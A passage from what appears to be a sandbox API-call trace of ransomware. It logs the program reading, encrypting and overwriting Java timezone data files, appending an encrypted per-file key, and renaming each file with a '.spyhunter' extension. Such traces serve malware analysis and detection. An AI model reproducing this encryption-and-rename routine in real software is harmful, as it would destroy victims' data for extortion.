0x2c375d8 [0169.041] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e584*=0x748, lpOverlapped=0x0) returned 1 [0169.069] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff8b8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.069] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x748, lpNumberOfBytesWritten=0x248e584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e584*=0x748, lpOverlapped=0x0) returned 1 [0169.069] GetProcessHeap () returned 0x2c0000 [0169.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.069] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.069] WriteFile (in: hFile=0xb0, lpBuffer=0x248e5c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e584, lpOverlapped=0x0 | out: lpBuffer=0x248e5c4*, lpNumberOfBytesWritten=0x248e584*=0x4, lpOverlapped=0x0) returned 1 [0169.069] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e584, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e584*=0x30, lpOverlapped=0x0) returned 1 [0169.069] CloseHandle (hObject=0xb0) returned 1 [0169.069] GetProcessHeap () returned 0x2c0000 [0169.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.069] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira.spyhunter") returned 70 [0169.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\madeira"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Madeira.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\madeira.spyhunter")) returned 1 [0169.070] GetProcessHeap () returned 0x2c0000 [0169.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.070] GetProcessHeap () returned 0x2c0000 [0169.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.070] GetProcessHeap () returned 0x2c0000 [0169.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb308 | out: hHeap=0x2c0000) returned 1 [0169.070] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5c8 | out: pbBuffer=0x248e5c8) returned 1 [0169.070] GetProcessHeap () returned 0x2c0000 [0169.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.070] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5c0*=0x30) returned 1 [0169.071] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\bermuda"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.071] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda") returned 60 [0169.071] StrStrW (lpFirst="Bermuda", lpSrch=".txt") returned 0x0 [0169.071] GetProcessHeap () returned 0x2c0000 [0169.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.071] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e584*=0x464, lpOverlapped=0x0) returned 1 [0169.130] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.130] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x464, lpNumberOfBytesWritten=0x248e584, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e584*=0x464, lpOverlapped=0x0) returned 1 [0169.130] GetProcessHeap () returned 0x2c0000 [0169.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.131] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.131] WriteFile (in: hFile=0xb0, lpBuffer=0x248e5c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e584, lpOverlapped=0x0 | out: lpBuffer=0x248e5c4*, lpNumberOfBytesWritten=0x248e584*=0x4, lpOverlapped=0x0) returned 1 [0169.131] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e584, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e584*=0x30, lpOverlapped=0x0) returned 1 [0169.131] CloseHandle (hObject=0xb0) returned 1 [0169.131] GetProcessHeap () returned 0x2c0000 [0169.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.131] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda.spyhunter") returned 70 [0169.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\bermuda"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Atlantic\\Bermuda.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\atlantic\\bermuda.spyhunter")) returned 1 [0169.132] GetProcessHeap () returned 0x2c0000 [0169.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.132] GetProcessHeap () returned 0x2c0000 [0169.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.132] GetProcessHeap () returned 0x2c0000 [0169.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebb178 | out: hHeap=0x2c0000) returned 1 [0169.132] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5c0 | out: pbBuffer=0x248e5c0) returned 1 [0169.132] GetProcessHeap () returned 0x2c0000 [0169.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.132] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5b8*=0x30) returned 1 [0169.132] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\samarkand"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.217] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand") returned 58 [0169.217] StrStrW (lpFirst="Samarkand", lpSrch=".txt") returned 0x0 [0169.217] GetProcessHeap () returned 0x2c0000 [0169.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.217] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e57c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e57c*=0x105, lpOverlapped=0x0) returned 1 [0169.218] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffefb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.218] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x105, lpNumberOfBytesWritten=0x248e57c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e57c*=0x105, lpOverlapped=0x0) returned 1 [0169.218] GetProcessHeap () returned 0x2c0000 [0169.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.218] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.218] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e57c, lpOverlapped=0x0 | out: lpBuffer=0x248e5bc*, lpNumberOfBytesWritten=0x248e57c*=0x4, lpOverlapped=0x0) returned 1 [0169.218] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e57c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e57c*=0x30, lpOverlapped=0x0) returned 1 [0169.218] CloseHandle (hObject=0x9c) returned 1 [0169.218] GetProcessHeap () returned 0x2c0000 [0169.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.218] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand.spyhunter") returned 68 [0169.218] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\samarkand"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Samarkand.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\samarkand.spyhunter")) returned 1 [0169.296] GetProcessHeap () returned 0x2c0000 [0169.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.296] GetProcessHeap () returned 0x2c0000 [0169.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.296] GetProcessHeap () returned 0x2c0000 [0169.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebd280 | out: hHeap=0x2c0000) returned 1 [0169.296] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5c0 | out: pbBuffer=0x248e5c0) returned 1 [0169.296] GetProcessHeap () returned 0x2c0000 [0169.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.296] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5b8*=0x30) returned 1 [0169.296] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\rangoon"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.297] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon") returned 56 [0169.297] StrStrW (lpFirst="Rangoon", lpSrch=".txt") returned 0x0 [0169.297] GetProcessHeap () returned 0x2c0000 [0169.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.297] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e57c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e57c*=0x55, lpOverlapped=0x0) returned 1 [0169.298] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.298] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x248e57c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e57c*=0x55, lpOverlapped=0x0) returned 1 [0169.298] GetProcessHeap () returned 0x2c0000 [0169.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.298] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.298] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e57c, lpOverlapped=0x0 | out: lpBuffer=0x248e5bc*, lpNumberOfBytesWritten=0x248e57c*=0x4, lpOverlapped=0x0) returned 1 [0169.298] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e57c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e57c*=0x30, lpOverlapped=0x0) returned 1 [0169.298] CloseHandle (hObject=0x9c) returned 1 [0169.298] GetProcessHeap () returned 0x2c0000 [0169.298] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.299] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon.spyhunter") returned 66 [0169.299] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\rangoon"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Rangoon.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\rangoon.spyhunter")) returned 1 [0169.299] GetProcessHeap () returned 0x2c0000 [0169.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.299] GetProcessHeap () returned 0x2c0000 [0169.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.299] GetProcessHeap () returned 0x2c0000 [0169.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebcec0 | out: hHeap=0x2c0000) returned 1 [0169.299] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5b8 | out: pbBuffer=0x248e5b8) returned 1 [0169.299] GetProcessHeap () returned 0x2c0000 [0169.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.300] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5b0*=0x30) returned 1 [0169.300] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qyzylorda"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.300] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda") returned 58 [0169.300] StrStrW (lpFirst="Qyzylorda", lpSrch=".txt") returned 0x0 [0169.300] GetProcessHeap () returned 0x2c0000 [0169.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.300] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e574, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e574*=0x1d1, lpOverlapped=0x0) returned 1 [0169.301] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.301] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1d1, lpNumberOfBytesWritten=0x248e574, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e574*=0x1d1, lpOverlapped=0x0) returned 1 [0169.301] GetProcessHeap () returned 0x2c0000 [0169.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.301] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.301] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e574, lpOverlapped=0x0 | out: lpBuffer=0x248e5b4*, lpNumberOfBytesWritten=0x248e574*=0x4, lpOverlapped=0x0) returned 1 [0169.301] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e574, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e574*=0x30, lpOverlapped=0x0) returned 1 [0169.301] CloseHandle (hObject=0x9c) returned 1 [0169.301] GetProcessHeap () returned 0x2c0000 [0169.301] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.302] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda.spyhunter") returned 68 [0169.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qyzylorda"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qyzylorda.spyhunter")) returned 1 [0169.302] GetProcessHeap () returned 0x2c0000 [0169.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.302] GetProcessHeap () returned 0x2c0000 [0169.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.302] GetProcessHeap () returned 0x2c0000 [0169.302] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebce00 | out: hHeap=0x2c0000) returned 1 [0169.302] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5b8 | out: pbBuffer=0x248e5b8) returned 1 [0169.303] GetProcessHeap () returned 0x2c0000 [0169.303] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.303] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5b0*=0x30) returned 1 [0169.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qatar"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.303] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar") returned 54 [0169.304] StrStrW (lpFirst="Qatar", lpSrch=".txt") returned 0x0 [0169.304] GetProcessHeap () returned 0x2c0000 [0169.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.304] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e574, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e574*=0x4d, lpOverlapped=0x0) returned 1 [0169.305] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.305] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x248e574, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e574*=0x4d, lpOverlapped=0x0) returned 1 [0169.305] GetProcessHeap () returned 0x2c0000 [0169.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.305] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.305] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e574, lpOverlapped=0x0 | out: lpBuffer=0x248e5b4*, lpNumberOfBytesWritten=0x248e574*=0x4, lpOverlapped=0x0) returned 1 [0169.305] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e574, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e574*=0x30, lpOverlapped=0x0) returned 1 [0169.305] CloseHandle (hObject=0x9c) returned 1 [0169.305] GetProcessHeap () returned 0x2c0000 [0169.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.305] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar.spyhunter") returned 64 [0169.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qatar"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qatar.spyhunter")) returned 1 [0169.306] GetProcessHeap () returned 0x2c0000 [0169.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.306] GetProcessHeap () returned 0x2c0000 [0169.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.306] GetProcessHeap () returned 0x2c0000 [0169.306] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27878 | out: hHeap=0x2c0000) returned 1 [0169.306] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5b0 | out: pbBuffer=0x248e5b0) returned 1 [0169.306] GetProcessHeap () returned 0x2c0000 [0169.306] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.306] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5a8*=0x30) returned 1 [0169.306] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pyongyang"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.307] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang") returned 58 [0169.307] StrStrW (lpFirst="Pyongyang", lpSrch=".txt") returned 0x0 [0169.307] GetProcessHeap () returned 0x2c0000 [0169.307] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.307] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e56c*=0x65, lpOverlapped=0x0) returned 1 [0169.308] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff9b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.308] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x248e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e56c*=0x65, lpOverlapped=0x0) returned 1 [0169.308] GetProcessHeap () returned 0x2c0000 [0169.308] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.308] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.308] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e56c, lpOverlapped=0x0 | out: lpBuffer=0x248e5ac*, lpNumberOfBytesWritten=0x248e56c*=0x4, lpOverlapped=0x0) returned 1 [0169.308] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e56c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e56c*=0x30, lpOverlapped=0x0) returned 1 [0169.308] CloseHandle (hObject=0x9c) returned 1 [0169.308] GetProcessHeap () returned 0x2c0000 [0169.308] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.308] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files 